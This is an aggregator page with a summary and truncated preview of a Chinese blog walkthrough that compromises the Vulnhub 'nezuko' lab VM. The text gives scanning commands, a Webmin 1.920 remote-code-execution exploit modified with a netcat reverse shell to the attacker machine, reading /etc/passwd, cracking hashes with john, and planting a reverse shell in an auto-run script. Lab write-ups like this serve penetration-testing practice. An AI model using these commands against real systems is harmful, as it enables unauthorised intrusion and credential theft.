今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之nezuko的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-07-01 08:57
    

主要观点总结

本文描述了使用Vulnhub的nezuko镜像进行渗透测试的过程,包括导入镜像、扫描地址和端口、发现Webmin服务漏洞、利用漏洞获取反弹shell、获取交互式shell、查看密码文件内容、破解用户密码、切换账户、制作反弹shell脚本并添加到自动执行的文件中,最终获得root权限的过程。

关键观点总结

关键观点1: 下载并导入nezuko镜像。

文章首先提供了下载镜像的链接,并成功使用virtualbox导入镜像。

关键观点2: 地址和端口扫描。

通过sudo netdiscover和sudo nmap命令扫描地址和端口,发现靶机地址和Webmin服务。

关键观点3: 利用Webmin服务漏洞。

查找Webmin 1.920版本的漏洞,并找到可远程代码执行的漏洞。

关键观点4: 获取反弹shell和交互式shell。

通过修改漏洞利用脚本,添加反弹shell命令,并在攻击机上开启监听,执行脚本后获取反弹shell,再转为交互式shell。

关键观点5: 获取并破解用户密码。

查看密码文件内容,获取用户hash密码,使用john工具进行暴力破解,获得用户名和密码。

关键观点6: 获得root权限。

通过替换message_to_nezuko.sh文件中的内容,制作自己的反弹shell脚本并添加到该文件中,最终获得root权限。


文章预览

本周实践的是vulnhub的nezuko镜像, 下载地址,https://download.vulnhub.com/nezuko/nezuko.zip, 用virtualbox导入成功, 做地址扫描,sudo netdiscover -r 192.168.0.0/24, 获取到靶机地址是192.168.0.183, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.183, 发现靶机有13337端口的Webmin服务,版本是1.920, 查找可利用的漏洞,searchsploit Webmin 1.920, 发现个可远程代码执行的,把漏洞利用脚本复制到当前目录, 查看脚本内容,cat 47293.sh,找到可插入反弹shell命令的点, 修改脚本,vim 47293.sh, 添加反弹shell命令,nc -e /bin/bash 192.168.0.186 4444, kali攻击机上开启反弹shell监听,nc -lvp 4444, 执行漏洞利用脚本,sh 47293.sh https://192.168.0.183:13337, 获取到反弹shell,转成交互式shell, python3 -c 'import pty;pty.spawn("/bin/bash")', 查看密码文件内容,cat /etc/passwd, 获取到zenitsu账户的hash密码, 添加到文 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览